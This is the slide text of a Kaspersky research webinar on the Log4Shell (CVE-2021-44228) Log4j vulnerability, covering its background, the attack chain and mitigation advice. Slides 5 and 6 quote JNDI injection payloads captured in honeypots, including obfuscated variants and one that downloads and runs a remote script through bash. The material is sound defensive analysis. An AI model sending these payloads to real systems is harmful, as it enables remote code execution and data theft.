On December 9th, researchers uncovered a zero-day critical vulnerability in the Apache Log4j library used by millions of Java applications. CVE-2021-44228 or “Log4Shell” is a RCE vulnerability that allows attackers to execute arbitrary code and potentially take full control over an infected system. The vulnerability has been ranked a 10/10 on the CVSSv3 severity scale. While the Apache Foundation has already released a patch for this CVE, it can take weeks or months for vendors to update their software, and there are already widespread scans being conducted by malicious attackers to exploit Log4Shell. What should companies or organizations do? Join Marco Preuss, Head of Europe’s Global Research and Analysis (GReAT) team, Marc Rivero and Dan Demeter, Senior Security Researchers with GReAT, for an in-depth discussion on Log4Shell and a live Q&A session. To see the full webinar, please visit: https://securelist.com/webinars/log4shell-vulnerability-how-to-stay-secure/?utm_source=Slideshare&utm_medium=partner&utm_campaign=gl_jespo_je0066&utm_content=link&utm_term=gl_Slideshare_organic_s966w1tou5a0snh

1. Vulnerability: “Log4Shell”
[CVE-2021-44228]
•
Global Research and Analysis Team (GReAT)
Kaspersky
Dan Demeter, Marc Rivero, Marco Preuss
Webinar 12.2021

2. We are
Global Research and Analysis Team
Operational since 2008
Globally distributed elite threats research group
APTs, complex and highly
sophisticated targeted
attacks, big threats against
banks/financial institutions,
firmware threats…

3. 3
How it started…
https://archive.md/xD3OO
Log4Shell

4. 4
The Vulnerability
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://logging.apache.org/log4j/2.x/download.html
https://logging.apache.org/log4j/2.x/changes-report.html
Summary:
- vulnerability in “Apache Log4j 2”
- 0-day released on 09.12.2021
- Remote code execution
- PoC-Code is available
- Widely used component in commercial and open-source applications
- Severity: critical
- affected: version 2.0 <= 2.14.1
2.15.0-rc1 pot. still included a bypass an implemented fix
- Fixed version: 2.16.0
- CVE-2021-44228 created 2021.11.26
- NIST NVD published 10.12.2021
- Version 2.0 was released on 2014-07-12 [more than 7 years ago!]
- Attack vector for JNDi, presented at Blackhat in 2016
Log4Shell

5. 5
Exploiting example:
${jndi:ldap[:]//malicious.xyz/x}
${jndi:[service]://[host].[port]/[path]}
JNDI: Java Naming and Directory Interface
LDAP: Lightweight Directory Access Protocol
JNDI is a JAVA-internal API or SPI (Service Provider Interface)
e.g. methods to query information based on names like LDAP, DNS,
NIS, CORBA etc.
Some things to know
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface
HTTP request

6. 6
${jndi%3aldap%3a//0ky8rj5089x9qx7tq8djb3rpp.canarytokens[.]com/a}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName:user:env}.c6340b92vtc0
0002scfggdpcz9eyyyyyd.interactsh[.]com}
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160[.]149:12344/Basic/Com
mand/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC80NS41Ni45Mi4
yMjk6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvNDUuNTYu
OTIuMjI5OjgwKXxiYXNo}
${jndi:ldap:/5819.u837r4g5oolsy8hudoz24c15nwtohd.burpcollaborator[.]net/a}
${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV
_NAME:-:}//62.182.80.168:1389/pien3m}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:l}${lower:d}${lower:a}${lower:p}}://
67.205.191.102:1389/koejir}}
What we could observe in our honeypot network? - Modifications made by the attackers
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface

7. 7

8. 8
How the attack chain works? - First pair of requests
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface

9. 9
How the attack chain works? - Second pair of requests
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface

10. 10
How the attack chain works? - Latest event observed in our honeypots
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface

11. 11
How the attack chain works? - Latest event observed in our honeypots
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface

12. 12
How the attack chain works? - Kinsing malware
https://en.wikipedia.org/wiki/Java_Naming_and_Directory_Interface

13. 13
Attacker by Countries
will be added thursday
afternoon with fresh data

14. 14
statistics 2
will be added thursday
afternoon with fresh data

15. 15
D
Alternative if you can not patch
Mitigate as outlined by Apache.org¹
use WAF, IPS, Webserver-block-rules
use IDS, Yara, Sigma for detection
C Check Logs
Monitor application logs
use IDS and tools to identify
attacks
B
Update log4j 2
latest version: 2.16.0
https://logging.apache.org/log4j/2.x
/download.html
A
Identify installed log4j
check your running software
Solve/mitigate
CVE-2021-44228
What organisations should do
¹https://logging.apache.org/log4j/2.x/security.html
Kaspersky products protect!
- UMIDS:Intrusion.Generic.CVE-2021-44228.*
- PDM:Exploit.Win32.Generic

16. 16
further references/reading/material
Websites:
• Securelist: https://securelist.com/cve-2021-44228-vulnerability-in-apache-log4j-library/105210/
• NCSC (NL): https://github.com/NCSC-NL/log4shell
• Blocklist by Costin Raiu and Markus Neis: https://github.com/craiu/iocs/tree/main/log4shell
• Apache Log4j 2 official security: https://logging.apache.org/log4j/2.x/security.html
Twitter:
• Marc Rivero López: @Seifreed
• Dan Demeter: @_xdanx
• Marco Preuss: @marco_preuss
Feel free to follow on LinkedIn and other channels as well!

17. Thank you! Let’s talk
Dan Demeter, Marc Rivero, Marco Preuss